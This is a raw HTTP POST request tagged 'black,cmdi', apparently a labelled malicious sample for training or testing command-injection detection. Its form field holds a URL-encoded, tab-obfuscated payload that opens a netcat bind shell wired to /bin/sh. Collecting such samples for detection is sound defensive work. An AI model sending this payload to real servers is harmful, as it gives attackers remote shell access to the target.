# tag: black,cmdi
POST / HTTP/1.1
Host: 100.0.0.102:9999
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Length: 164
Content-Type: application/x-www-form-urlencoded

f2ek3=mkfifo+%2Ftmp%2Fvhmu%3B+%28nc%09-l%09-p+22940+%7C%7Cnc%09-l+22940%290%3C%2Ftmp%2Fvhmu%09%7C%09%2Fbin%2Fsh+%3E%2Ftmp%2Fvhmu%092%3E%261%3B+rm%09%2Ftmp%2Fvhmu%09